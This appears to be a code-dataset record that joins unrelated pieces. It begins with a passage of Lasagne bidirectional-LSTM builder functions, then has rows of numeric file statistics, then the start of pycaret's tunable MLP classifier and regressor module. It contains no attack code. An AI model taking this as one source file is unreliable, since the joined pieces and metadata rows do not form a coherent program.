l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTM_softplus(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.softplus
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.softplus,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.softplus
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.softplus,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTM_softplusN(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.softplus
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.softplus,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.softplus
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.softplus,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTM_N(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTMsig_N(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.sigmoid,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.sigmoid,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTMtan_N(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTMconst(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
| 35.750733
| 149
| 0.596013
| 2,835
| 24,382
| 4.960141
| 0.021869
| 0.18774
| 0.106386
| 0.112644
| 0.993458
| 0.993458
| 0.993458
| 0.993458
| 0.993458
| 0.993458
| 0
| 0.018
| 0.291362
| 24,382
| 681
| 150
| 35.803231
| 0.795868
| 0.001353
| 0
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0128
| false
| 0
| 0.0016
| 0
| 0.0272
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcb2ddaefeedb11317b272826c74ebb4d9351af0
| 44,403
|
py
|
Python
|
pycaret/internal/tunable.py
|
AIIP-DEV/pycaret
|
0e09cd065f5927f120d7c8a9356f95974bfaea01
|
[
"MIT"
] | 1
|
2021-04-22T23:39:46.000Z
|
2021-04-22T23:39:46.000Z
|
pycaret/internal/tunable.py
|
AIIP-DEV/pycaret
|
0e09cd065f5927f120d7c8a9356f95974bfaea01
|
[
"MIT"
] | null | null | null |
pycaret/internal/tunable.py
|
AIIP-DEV/pycaret
|
0e09cd065f5927f120d7c8a9356f95974bfaea01
|
[
"MIT"
] | 1
|
2021-01-14T07:47:59.000Z
|
2021-01-14T07:47:59.000Z
|
# Module: internal.tunable
# Author: Antoni Baum (Yard1) <antoni.baum@protonmail.com>
# License: MIT
# Provides a VotingClassifier which weights can be tuned.
from sklearn.ensemble import VotingClassifier, VotingRegressor
from sklearn.neural_network import MLPClassifier, MLPRegressor
try:
from collections.abc import Iterable
except:
from collections import Iterable
class TunableMLPClassifier(MLPClassifier):
"""
A MLPClassifier with hidden layer sizes being kwargs instead of a list/tuple, allowing
for tuning.
The kwargs need to be in format ``hidden_layer_size_n``, where n is an integer corresponding
to the index of the layer.
If ``hidden_layer_sizes`` parameter is changed with ``set_params()``, ``hidden_layer_size_n``
parameters will change as well, and vice versa.
scikit-learn description below:
Multi-layer Perceptron classifier.
This model optimizes the log-loss function using LBFGS or stochastic
gradient descent.
.. versionadded:: 0.18
Parameters
----------
hidden_layer_sizes : tuple, length = n_layers - 2, default=(100,)
The ith element represents the number of neurons in the ith
hidden layer.
activation : {'identity', 'logistic', 'tanh', 'relu'}, default='relu'
Activation function for the hidden layer.
- 'identity', no-op activation, useful to implement linear bottleneck,
returns f(x) = x
- 'logistic', the logistic sigmoid function,
returns f(x) = 1 / (1 + exp(-x)).
- 'tanh', the hyperbolic tan function,
returns f(x) = tanh(x).
- 'relu', the rectified linear unit function,
returns f(x) = max(0, x)
solver : {'lbfgs', 'sgd', 'adam'}, default='adam'
The solver for weight optimization.
- 'lbfgs' is an optimizer in the family of quasi-Newton methods.
- 'sgd' refers to stochastic gradient descent.
- 'adam' refers to a stochastic gradient-based optimizer proposed
by Kingma, Diederik, and Jimmy Ba
Note: The default solver 'adam' works pretty well on relatively
large datasets (with thousands of training samples or more) in terms of
both training time and validation score.
For small datasets, however, 'lbfgs' can converge faster and perform
better.
alpha : float, default=0.0001
L2 penalty (regularization term) parameter.
batch_size : int, default='auto'
Size of minibatches for stochastic optimizers.
If the solver is 'lbfgs', the classifier will not use minibatch.
When set to "auto", `batch_size=min(200, n_samples)`
learning_rate : {'constant', 'invscaling', 'adaptive'}, default='constant'
Learning rate schedule for weight updates.
- 'constant' is a constant learning rate given by
'learning_rate_init'.
- 'invscaling' gradually decreases the learning rate at each
time step 't' using an inverse scaling exponent of 'power_t'.
effective_learning_rate = learning_rate_init / pow(t, power_t)
- 'adaptive' keeps the learning rate constant to
'learning_rate_init' as long as training loss keeps decreasing.
Each time two consecutive epochs fail to decrease training loss by at
least tol, or fail to increase validation score by at least tol if
'early_stopping' is on, the current learning rate is divided by 5.
Only used when ``solver='sgd'``.
learning_rate_init : double, default=0.001
The initial learning rate used. It controls the step-size
in updating the weights. Only used when solver='sgd' or 'adam'.
power_t : double, default=0.5
The exponent for inverse scaling learning rate.
It is used in updating effective learning rate when the learning_rate
is set to 'invscaling'. Only used when solver='sgd'.
max_iter : int, default=200
Maximum number of iterations. The solver iterates until convergence
(determined by 'tol') or this number of iterations. For stochastic
solvers ('sgd', 'adam'), note that this determines the number of epochs
(how many times each data point will be used), not the number of
gradient steps.
shuffle : bool, default=True
Whether to shuffle samples in each iteration. Only used when
solver='sgd' or 'adam'.
random_state : int, RandomState instance, default=None
Determines random number generation for weights and bias
initialization, train-test split if early stopping is used, and batch
sampling when solver='sgd' or 'adam'.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
tol : float, default=1e-4
Tolerance for the optimization. When the loss or score is not improving
by at least ``tol`` for ``n_iter_no_change`` consecutive iterations,
unless ``learning_rate`` is set to 'adaptive', convergence is
considered to be reached and training stops.
verbose : bool, default=False
Whether to print progress messages to stdout.
warm_start : bool, default=False
When set to True, reuse the solution of the previous
call to fit as initialization, otherwise, just erase the
previous solution. See :term:`the Glossary <warm_start>`.
momentum : float, default=0.9
Momentum for gradient descent update. Should be between 0 and 1. Only
used when solver='sgd'.
nesterovs_momentum : boolean, default=True
Whether to use Nesterov's momentum. Only used when solver='sgd' and
momentum > 0.
early_stopping : bool, default=False
Whether to use early stopping to terminate training when validation
score is not improving. If set to true, it will automatically set
aside 10% of training data as validation and terminate training when
validation score is not improving by at least tol for
``n_iter_no_change`` consecutive epochs. The split is stratified,
except in a multilabel setting.
Only effective when solver='sgd' or 'adam'
validation_fraction : float, default=0.1
The proportion of training data to set aside as validation set for
early stopping. Must be between 0 and 1.
Only used if early_stopping is True
beta_1 : float, default=0.9
Exponential decay rate for estimates of first moment vector in adam,
should be in [0, 1). Only used when solver='adam'
beta_2 : float, default=0.999
Exponential decay rate for estimates of second moment vector in adam,
should be in [0, 1). Only used when solver='adam'
epsilon : float, default=1e-8
Value for numerical stability in adam. Only used when solver='adam'
n_iter_no_change : int, default=10
Maximum number of epochs to not meet ``tol`` improvement.
Only effective when solver='sgd' or 'adam'
.. versionadded:: 0.20
max_fun : int, default=15000
Only used when solver='lbfgs'. Maximum number of loss function calls.
The solver iterates until convergence (determined by 'tol'), number
of iterations reaches max_iter, or this number of loss function calls.
Note that number of loss function calls will be greater than or equal
to the number of iterations for the `MLPClassifier`.
.. versionadded:: 0.22
**kwargs:
Hidden layer sizes in format ``hidden_layer_size_n`` where ``n``
is an integer corresponding to the index of the estimator.
If value is lesser or equal to zero, the hidden layer will be removed.
Will overwrite ``hidden_layer_sizes``.
Attributes
----------
classes_ : ndarray or list of ndarray of shape (n_classes,)
Class labels for each output.
loss_ : float
The current loss computed with the loss function.
coefs_ : list, length n_layers - 1
The ith element in the list represents the weight matrix corresponding
to layer i.
intercepts_ : list, length n_layers - 1
The ith element in the list represents the bias vector corresponding to
layer i + 1.
n_iter_ : int,
The number of iterations the solver has ran.
n_layers_ : int
Number of layers.
n_outputs_ : int
Number of outputs.
out_activation_ : string
Name of the output activation function.
Examples
--------
>>> from sklearn.neural_network import MLPClassifier
>>> from sklearn.datasets import make_classification
>>> from sklearn.model_selection import train_test_split
>>> X, y = make_classification(n_samples=100, random_state=1)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y,
... random_state=1)
>>> clf = MLPClassifier(random_state=1, max_iter=300).fit(X_train, y_train)
>>> clf.predict_proba(X_test[:1])
array([[0.038..., 0.961...]])
>>> clf.predict(X_test[:5, :])
array([1, 0, 1, 0, 1])
>>> clf.score(X_test, y_test)
0.8...
Notes
-----
MLPClassifier trains iteratively since at each time step
the partial derivatives of the loss function with respect to the model
parameters are computed to update the parameters.
It can also have a regularization term added to the loss function
that shrinks model parameters to prevent overfitting.
This implementation works with data represented as dense numpy arrays or
sparse scipy arrays of floating point values.
References
----------
Hinton, Geoffrey E.
"Connectionist learning procedures." Artificial intelligence 40.1
(1989): 185-234.
Glorot, Xavier, and Yoshua Bengio. "Understanding the difficulty of
training deep feedforward neural networks." International Conference
on Artificial Intelligence and Statistics. 2010.
He, Kaiming, et al. "Delving deep into rectifiers: Surpassing human-level
performance on imagenet classification." arXiv preprint
arXiv:1502.01852 (2015).
Kingma, Diederik, and Jimmy Ba. "Adam: A method for stochastic
optimization." arXiv preprint arXiv:1412.6980 (2014).
"""
def __init__(
self,
hidden_layer_sizes=None,
activation="relu",
*,
solver="adam",
alpha=0.0001,
batch_size="auto",
learning_rate="constant",
learning_rate_init=0.001,
power_t=0.5,
max_iter=200,
shuffle=True,
random_state=None,
tol=1e-4,
verbose=False,
warm_start=False,
momentum=0.9,
nesterovs_momentum=True,
early_stopping=False,
validation_fraction=0.1,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-8,
n_iter_no_change=10,
max_fun=15000,
**kwargs,
):
self.hidden_layer_sizes = hidden_layer_sizes
self._hidden_layer_size_kwargs_to_hidden_layer_sizes(kwargs)
super().__init__(
hidden_layer_sizes=self.hidden_layer_sizes,
activation=activation,
solver=solver,
alpha=alpha,
batch_size=batch_size,
learning_rate=learning_rate,
learning_rate_init=learning_rate_init,
power_t=power_t,
max_iter=max_iter,
shuffle=shuffle,
random_state=random_state,
tol=tol,
verbose=verbose,
warm_start=warm_start,
momentum=momentum,
nesterovs_momentum=nesterovs_momentum,
early_stopping=early_stopping,
validation_fraction=validation_fraction,
beta_1=beta_1,
beta_2=beta_2,
epsilon=epsilon,
n_iter_no_change=n_iter_no_change,
max_fun=max_fun,
)
def _hidden_layer_size_kwargs_to_hidden_layer_sizes(self, kwargs):
if not self.hidden_layer_sizes:
self.hidden_layer_sizes = [100]
if not isinstance(self.hidden_layer_sizes, Iterable):
self.hidden_layer_sizes = [self.hidden_layer_sizes]
if not isinstance(self.hidden_layer_sizes, list):
self.hidden_layer_sizes = list(self.hidden_layer_sizes)
reset_layers = False
for k, v in kwargs.items():
if k.startswith("hidden_layer_size_") and not (
k in self.__dict__ and self.__dict__[k] == v
):
try:
hidden_layer_size = k.split("_")
hidden_layer_size = int(hidden_layer_size[3])
if v <= 0:
self.hidden_layer_sizes.pop(hidden_layer_size)
else:
if hidden_layer_size < len(self.hidden_layer_sizes):
self.hidden_layer_sizes[hidden_layer_size] = v
else:
self.hidden_layer_sizes = (
self.hidden_layer_sizes
+ [1]
* (hidden_layer_size - len(self.hidden_layer_sizes))
+ [v]
)
reset_layers = True
except:
pass
if reset_layers:
self._hidden_layer_sizes_to_hidden_layer_size_kwargs()
def _hidden_layer_sizes_to_hidden_layer_size_kwargs(self):
to_delete = []
for k, v in self.__dict__.items():
if k.startswith("hidden_layer_size_") and int(k.split("_")[3]) >= len(
self.hidden_layer_sizes
):
to_delete.append(k)
for k in to_delete:
delattr(self, k)
for i, w in enumerate(self.hidden_layer_sizes):
if not (
f"hidden_layer_size_{i}" in self.__dict__
and self.__dict__[f"hidden_layer_size_{i}"] == w
):
setattr(self, f"hidden_layer_size_{i}", w)
def set_params(self, **params):
"""
Set the parameters of this estimator.
The method works on simple estimators as well as on nested objects
(such as pipelines). The latter have parameters of the form
``<component>__<parameter>`` so that it's possible to update each
component of a nested object.
Parameters
----------
**params : dict
Estimator parameters.
Returns
-------
self : object
Estimator instance.
"""
self._hidden_layer_size_kwargs_to_hidden_layer_sizes(params)
super().set_params(
**{
k: v
for k, v in params.items()
if not k.startswith("hidden_layer_size_")
}
)
return self
def get_params(self, deep=True):
"""
Get parameters for this estimator.
Parameters
----------
deep : bool, default=True
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
r = super().get_params(deep=deep)
if self.hidden_layer_sizes:
for i, w in enumerate(self.hidden_layer_sizes):
if f"hidden_layer_size_{i}" not in r:
r[f"hidden_layer_size_{i}"] = w
return r
def fit(self, X, y, **fit_params):
"""Fit the model to data matrix X and target(s) y.
Parameters
----------
X : ndarray or sparse matrix of shape (n_samples, n_features)
The input data.
y : ndarray, shape (n_samples,) or (n_samples, n_outputs)
The target values (class labels in classification, real numbers in
regression).
Returns
-------
self : returns a trained MLP model.
"""
return super().fit(X, y)
def _partial_fit(self, X, y, classes=None, **fit_params):
return super()._partial_fit(X, y, classes=classes)
class TunableMLPRegressor(MLPRegressor):
"""
A MLPRegressor with hidden layer sizes being kwargs instead of a list/tuple, allowing
for tuning.
The kwargs need to be in format ``hidden_layer_size_n``, where n is an integer corresponding
to the index of the layer.
If ``hidden_layer_sizes`` parameter is changed with ``set_params()``, ``hidden_layer_size_n``
parameters will change as well, and vice versa.
scikit-learn description below:
Multi-layer Perceptron regressor.
This model optimizes the squared-loss using LBFGS or stochastic gradient
descent.
.. versionadded:: 0.18
Parameters
----------
hidden_layer_sizes : tuple, length = n_layers - 2, default=(100,)
The ith element represents the number of neurons in the ith
hidden layer.
activation : {'identity', 'logistic', 'tanh', 'relu'}, default='relu'
Activation function for the hidden layer.
- 'identity', no-op activation, useful to implement linear bottleneck,
returns f(x) = x
- 'logistic', the logistic sigmoid function,
returns f(x) = 1 / (1 + exp(-x)).
- 'tanh', the hyperbolic tan function,
returns f(x) = tanh(x).
- 'relu', the rectified linear unit function,
returns f(x) = max(0, x)
